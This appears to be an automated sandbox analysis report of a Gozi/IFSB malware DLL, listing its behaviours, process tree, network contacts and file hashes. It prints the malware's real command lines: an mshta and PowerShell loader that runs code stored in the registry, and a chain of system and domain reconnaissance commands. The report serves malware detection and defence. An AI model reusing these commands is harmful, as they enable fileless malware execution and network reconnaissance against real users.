Analysis Overview
SHA256
e192656ce9c73ac7bcb4cec136378c5843e128b76cd1c021aeec274edecbf869
Threat Level: Known bad
The file 62f24e6f4c4c7.dll was found to be: Known bad.
Malicious Activity Summary
Gozi, Gozi IFSB
Checks computer location settings
Suspicious use of SetThreadContext
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious use of SetWindowsHookEx
Suspicious use of AdjustPrivilegeToken
Suspicious behavior: GetForegroundWindowSpam
Suspicious behavior: MapViewOfSection
Suspicious use of WriteProcessMemory
Runs net.exe
Discovers systems in the same network
Gathers system information
Enumerates processes with tasklist
MITRE ATT&CK
Enterprise Matrix V6
Analysis: static1
Detonation Overview
Reported
2022-08-09 12:13
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2022-08-09 12:13
Reported
2022-08-09 12:16
Platform
win7-20220718-en
Max time kernel
42s
Max time network
45s
Command Line
Signatures
Gozi, Gozi IFSB
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 484 wrote to memory of 1948 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 484 wrote to memory of 1948 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 484 wrote to memory of 1948 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 484 wrote to memory of 1948 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 484 wrote to memory of 1948 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 484 wrote to memory of 1948 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
| PID 484 wrote to memory of 1948 | N/A | C:\Windows\system32\regsvr32.exe | C:\Windows\SysWOW64\regsvr32.exe |
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62f24e6f4c4c7.dll
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\62f24e6f4c4c7.dll
Network
Files
memory/484-54-0x000007FEFC0D1000-0x000007FEFC0D3000-memory.dmp
memory/1948-55-0x0000000000000000-mapping.dmp
memory/1948-56-0x0000000076681000-0x0000000076683000-memory.dmp
memory/1948-57-0x0000000010000000-0x000000001000E000-memory.dmp
memory/1948-62-0x0000000000210000-0x000000000021D000-memory.dmp
Analysis: behavioral2
Detonation Overview
Submitted
2022-08-09 12:13
Reported
2022-08-09 12:16
Platform
win10v2004-20220721-en
Max time kernel
150s
Max time network
148s
Command Line
Signatures
Gozi, Gozi IFSB
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2660308776-3705150086-26593515-1000\Control Panel\International\Geo\Nation | C:\Windows\System32\mshta.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1780 set thread context of 60 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 60 set thread context of 3524 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 60 set thread context of 3812 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 60 set thread context of 1768 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 60 set thread context of 4156 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 60 set thread context of 5020 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRestorePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeRemoteShutdownPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeUndockPrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeManageVolumePrivilege | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 33 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 34 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 35 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: 36 | N/A | C:\Windows\System32\Wbem\WMIC.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\system32\regsvr32.exe
regsvr32 /s C:\Users\Admin\AppData\Local\Temp\62f24e6f4c4c7.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\SysWOW64\regsvr32.exe
/s C:\Users\Admin\AppData\Local\Temp\62f24e6f4c4c7.dll
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>U9kv='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(U9kv).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\53818B71-9696-FD5C-3837-2A81EC5BFE45\\\SystemText'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name nxgbcyqq -value gp; new-alias -name bvmykoaq -value iex; bvmykoaq ([System.Text.Encoding]::ASCII.GetString((nxgbcyqq "HKCU:Software\AppDataLow\Software\Microsoft\53818B71-9696-FD5C-3837-2A81EC5BFE45").StopName))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\luglk0su\luglk0su.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES79F3.tmp" "c:\Users\Admin\AppData\Local\Temp\luglk0su\CSC66E30DDD74564D7FAD61A68677EC175F.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\voooxh2f\voooxh2f.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7B98.tmp" "c:\Users\Admin\AppData\Local\Temp\voooxh2f\CSCE59AACFE665E40B3A6BCCA3A5DC5B0CC.TMP"
C:\Windows\system32\cmd.exe
cmd /C "wmic computersystem get domain |more > C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\System32\Wbem\WMIC.exe
wmic computersystem get domain
C:\Windows\system32\more.com
more
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\AF85.bin1 > C:\Users\Admin\AppData\Local\Temp\AF85.bin & del C:\Users\Admin\AppData\Local\Temp\AF85.bin1"
Network
| Country | Destination | Domain | Proto |
| US | 93.184.221.240:80 | tcp | |
| FR | 2.18.109.224:443 | tcp | |
| US | 13.107.42.16:80 | config.edge.skype.com | tcp |
| NL | 20.50.201.200:443 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| US | 93.184.221.240:80 | tcp | |
| NL | 79.110.52.8:80 | 79.110.52.8 | tcp |
| RU | 5.42.199.72:80 | 5.42.199.72 | tcp |
| NL | 79.110.52.82:80 | 79.110.52.82 | tcp |
| DE | 185.212.47.98:8080 | tcp | |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
Files
memory/4284-130-0x0000000000000000-mapping.dmp
memory/4284-131-0x0000000010000000-0x000000001000E000-memory.dmp
memory/4284-136-0x00000000023F0000-0x00000000023FD000-memory.dmp
memory/1780-140-0x0000000000000000-mapping.dmp
memory/1780-141-0x000001A8FDBF0000-0x000001A8FDC12000-memory.dmp
memory/1780-142-0x00007FFE5DCA0000-0x00007FFE5E761000-memory.dmp
memory/5084-143-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\luglk0su\luglk0su.cmdline
| MD5 | 656b4449e49c439762f3298e8f791c4a |
| SHA1 | f6188ca043fd722d614c936ca3aa6ee3918e4819 |
| SHA256 | 01e40f3f68b2153ea916759a5f74a6ecb4ad000524f28f5fb76d60380976b5c0 |
| SHA512 | de75d4636f35ca997fb8bcbe3043b3ac91a10db7a3a8263fd333b2b51c2cc4c0ea14d8de0dc616b903e9238993e9cb7808f7b6f788eed4c28c43b06c381d8e61 |
\??\c:\Users\Admin\AppData\Local\Temp\luglk0su\luglk0su.0.cs
| MD5 | 9a10482acb9e6952b96f4efc24d9d783 |
| SHA1 | 5cfc9bf668351df25fcda98c3c2d0bb056c026c3 |
| SHA256 | a0424e1530f002761a882c19c22504153a5e86d7fbb41391e940452bfa15f377 |
| SHA512 | e932914ad99d7bd39561e020d1e8c1f4e175c16eae66df720100c65e40ccc3383b5145f703432885f3f1ce080e8a4feb045ddd5c8bbc2f3231c619d04182ac28 |
memory/904-146-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\luglk0su\CSC66E30DDD74564D7FAD61A68677EC175F.TMP
| MD5 | 43120dad150a63418c61cdfb6f0c3e5a |
| SHA1 | a93d3ff97c50ecbd07d90961e8c74336ad19d795 |
| SHA256 | ef793895b8f6302c4ef3f36e855fd660b7e1b83aa7e0738080005ba7ab123cc0 |
| SHA512 | b8a4091b1ac7aa00b71a1ddf511d93d705e51af5c1e98244483ffad29e4f6ce8252901241263f31a15c17f3ccd0b5ac1e22e1b6482ac05c103dedf8784171ed7 |
C:\Users\Admin\AppData\Local\Temp\RES79F3.tmp
| MD5 | aac7cad1346fddf49bcc50999d32028a |
| SHA1 | d8b961ff14c508158d690f5cde9835fb911a313b |
| SHA256 | f908a9b0e3e886b4596fa4648e126ea706533e3c7c13b3ec04b366a1baf9a48f |
| SHA512 | 5b10de5f9dd38a67e0233395e399e2e28ef0525f4e6bc71467c731f77bf093e51e469ed2c37e4a5f5110f7cc6a0fc71f37dfef7cc6da4a3cf9fe12f677f08304 |
C:\Users\Admin\AppData\Local\Temp\luglk0su\luglk0su.dll
| MD5 | c7d9f3f61cb9e23e1601155f8671de89 |
| SHA1 | a062adb5573127aca971c8bf038b0460a6100e3b |
| SHA256 | d46630e9daae2883c2ae4ea09fd0192651ff9a3446b9764d56cad2c73b429ed6 |
| SHA512 | 74041864bb59d59c49b153b925a1ea03d4487fb3c0abc0bf24ad5686d6d9f2728031e8464f8f9b3679d31f41010df7f860dac63787058b1d6a9983c60cc83601 |
memory/4468-150-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\voooxh2f\voooxh2f.cmdline
| MD5 | e12f9551140fd506830b7884daa72088 |
| SHA1 | 02cb7b4467eb2bed5b82333a6aed74b13f6b8550 |
| SHA256 | 6d65c4e67c9a849176549a3a3f4a8cdc09eb1b038160a07c830e4cb4c22445d5 |
| SHA512 | 961ab73fcd86640ffefa63f5fe937bbe33dc188df01469ba63a73552834aa7118a14f12eb17c78b0480f2dcf2aae106bc0b0f41b3473daec5c507ead65ff7255 |
\??\c:\Users\Admin\AppData\Local\Temp\voooxh2f\voooxh2f.0.cs
| MD5 | aca9704199c51fde14b8bf8165bc2a4c |
| SHA1 | 789b408ccad29240bd093515cbd19a199ad2c1c8 |
| SHA256 | cb3da8a9768252634f8ed4c62e026dc8217b055e00f11b6012a52ed130c92c27 |
| SHA512 | a8c1df598581f508ecbf1e516744f11abfb71ec6bb9895d0b61f15e70e56e27cb40b4e5395b9411b787f8bb4f264ca704d815260677909dc1e599d601d0b5de6 |
memory/1888-153-0x0000000000000000-mapping.dmp
\??\c:\Users\Admin\AppData\Local\Temp\voooxh2f\CSCE59AACFE665E40B3A6BCCA3A5DC5B0CC.TMP
| MD5 | 5e590b507ab39cfb2f4ca9c5f304263e |
| SHA1 | b6eee7f48a318893c3e59bab978291fa93f87c93 |
| SHA256 | 1ad1772817e70f91b333ba2fa79cb72d688c84e0f46bba959e775957235fbbd3 |
| SHA512 | f2097ce4e5952b109ae59f4d3e475422e1c6c5c934bca230655c6fc56386438a9f645c8401f5ce291c498cad18d2e0a87aeef360da2d906a38b9e3a46d99a627 |
C:\Users\Admin\AppData\Local\Temp\RES7B98.tmp
| MD5 | 73665f94cbe555366a1028cd5be1a185 |
| SHA1 | 89e260d43799e83155d96ddec74f49ebe25709fb |
| SHA256 | bd91ed0ecb6aad931165b5b25a1fa9602c63289a260a6fe25f734fdabeb33a87 |
| SHA512 | 96614fbd25c81f64d373c563b0909bbc84ec82a4f5ec846ebdd02fc025868e595a53549b7b6af4677306ae2dd3c3df17d91713d41d86c7d61d4c0246b4e093c1 |
C:\Users\Admin\AppData\Local\Temp\voooxh2f\voooxh2f.dll
| MD5 | e4b54aa48850ecdd5a66f2f44380c5a7 |
| SHA1 | 0c03ebf6daca0f606f0417c6ab481d148ba07e8d |
| SHA256 | 6cce6c88ad7502a578b7c734151953a8c1716ab86499299255be8c3ebddd2c55 |
| SHA512 | 6166deaf484ef39c22eb0486819c6d99b623393e964d8fd23bd7e0ecd5941e68b152f217bbf34379f6fcb6891fd1bb7136e96227eacf8f3c032242ae70e59274 |
memory/1780-157-0x00007FFE5DCA0000-0x00007FFE5E761000-memory.dmp
memory/1780-158-0x000001A8FE850000-0x000001A8FE88D000-memory.dmp
memory/3524-159-0x000001CBA90B0000-0x000001CBA9153000-memory.dmp
memory/60-161-0x0000000007870000-0x0000000007913000-memory.dmp
memory/3812-160-0x000001729AD70000-0x000001729AE13000-memory.dmp
memory/1892-163-0x0000000000000000-mapping.dmp
memory/5020-165-0x0000000000000000-mapping.dmp
memory/4156-164-0x00000288906E0000-0x0000028890783000-memory.dmp
memory/1768-162-0x000001B342370000-0x000001B342413000-memory.dmp
memory/5100-166-0x0000000000000000-mapping.dmp
memory/3416-167-0x0000000000000000-mapping.dmp
memory/5020-168-0x0000000000DC6B20-0x0000000000DC6B24-memory.dmp
memory/5020-169-0x0000000000BB0000-0x0000000000C46000-memory.dmp
memory/60-170-0x000000000A860000-0x000000000A99B000-memory.dmp
memory/60-174-0x000000000AE50000-0x000000000AF8A000-memory.dmp
memory/640-178-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | f7aea2435aa888b709ca20f816c33bfd |
| SHA1 | 38717c9a73b5f8bd399839cbe0aa57518427e758 |
| SHA256 | f0c30a157e0a0ea84b114c2b66a66d444a3824c2bfe7829d929b40e6548fa5d5 |
| SHA512 | 1ea828fc1932c97f5ba5f6ebf05f2816d4d89f003b094f2d0868d54f52b53774437037e2c8837e97b820d5f2e5d5707825b048a9ab2af261af00810f01bd8232 |
memory/2452-180-0x0000000000000000-mapping.dmp
memory/2916-182-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
memory/60-183-0x0000000008600000-0x000000000870C000-memory.dmp
memory/1008-187-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | 81e5279cdc4dd4b735bcf24c01a7bb2f |
| SHA1 | 32fc813ad8788d890f42465871c6018a27d13f69 |
| SHA256 | 6d9f6f7f714b3212d395a23bd90c415b7557f77fa6639deba983694f262fa80e |
| SHA512 | b3ff8ee16285da55f77fb6ee3054b912c9b7bd713d38df31e84d590214a1f38e470b7c49cfde21739cfaf51d74aaa06b7e744c332d25102f26fb6625c814989b |
memory/3112-189-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | 81e5279cdc4dd4b735bcf24c01a7bb2f |
| SHA1 | 32fc813ad8788d890f42465871c6018a27d13f69 |
| SHA256 | 6d9f6f7f714b3212d395a23bd90c415b7557f77fa6639deba983694f262fa80e |
| SHA512 | b3ff8ee16285da55f77fb6ee3054b912c9b7bd713d38df31e84d590214a1f38e470b7c49cfde21739cfaf51d74aaa06b7e744c332d25102f26fb6625c814989b |
memory/4488-191-0x0000000000000000-mapping.dmp
memory/60-192-0x0000000007870000-0x0000000007913000-memory.dmp
memory/5024-193-0x0000000000000000-mapping.dmp
memory/1452-194-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | 20ec779e4e952197cd7d3634340a64df |
| SHA1 | 729b0b13b11bc040082008582de505943fb519ff |
| SHA256 | 10b32a3a7ba8816ed97396117d85ac54fede545e026518591ce9e47daabbed20 |
| SHA512 | 7d95d9ad80c3a3432a5af688e73d909baf2ad888b56bc12cdd5c47facf8b5907701abb2ed4c8190a8874f3e2fde90e0c838cf84e64c0d21bdc3df84bdf41b5ce |
memory/396-196-0x0000000000000000-mapping.dmp
memory/3104-197-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | 96e05cf8a9a7d30fe96b0e9bacf05097 |
| SHA1 | 2868a527551c53f700986ee8238cf53556a26032 |
| SHA256 | 865eb1fe8974a7ff78e588d5f2d1ed580a479ac804191d1546cf31451cf5780d |
| SHA512 | 311aa6954b821c3ad3a6fbcb0ef267810889cdfb45fb02de8979f353ffdb6f7ac6d1fe2d31e316b0039785507fbbbbe677bc2f326c3d90acabafee2dd997407f |
memory/4332-199-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | c49baf7b191e35153f2547e04eb9fc34 |
| SHA1 | 876ced4f080a4d74bc31237d265595bfafa689a3 |
| SHA256 | 725e4d5534b71c115d7b807f0ac7410780a1e6baf6730a8d2995ed7ba7b33bfe |
| SHA512 | ec22771c6f092dc3b654fad2e3a0134c95922860f194b38878becff27ca708ffe41c1a1df59f2f8778cfd5e08d8b4450f5ece3f698686fc37b25545801e14b96 |
memory/2012-201-0x0000000000000000-mapping.dmp
memory/4216-202-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | 0f5f3bfa3ed53345590d6e4484a304e7 |
| SHA1 | 90965fc77ba387e741dad77403867c45aa7c7cba |
| SHA256 | 8aec95180172f3ff14ad3ccfc1498bc421915346d2381cbb4b8bf57722d37978 |
| SHA512 | 41f08a51653acaf87c88f52dc87f1a6807d2b1cef305fd7fa72e7ae811829e3b0eca5b60f284556be98b9e57f338dfc16c3a22f3435f079fb8fc3916a26db9d2 |
memory/2204-204-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | 0f5f3bfa3ed53345590d6e4484a304e7 |
| SHA1 | 90965fc77ba387e741dad77403867c45aa7c7cba |
| SHA256 | 8aec95180172f3ff14ad3ccfc1498bc421915346d2381cbb4b8bf57722d37978 |
| SHA512 | 41f08a51653acaf87c88f52dc87f1a6807d2b1cef305fd7fa72e7ae811829e3b0eca5b60f284556be98b9e57f338dfc16c3a22f3435f079fb8fc3916a26db9d2 |
memory/4768-206-0x0000000000000000-mapping.dmp
memory/3572-207-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | 670b19149afca9a3e5ec745e8bfe35fe |
| SHA1 | 5d6ae8b8253f1e4a3b3319169051f324f62129e9 |
| SHA256 | 7ba537a3376f393c421b1aab8065107ca4d522cb6f41eb97c2a947e84c419084 |
| SHA512 | fe167a89a9af71db0c248dc357407f270fe188a71fca0cc7bc1f4dc6b0a9554004d7d0d7f4dcacb249ba4c88365543f9641875c504697c18a1894167c757a219 |
memory/4544-209-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\AF85.bin1
| MD5 | 670b19149afca9a3e5ec745e8bfe35fe |
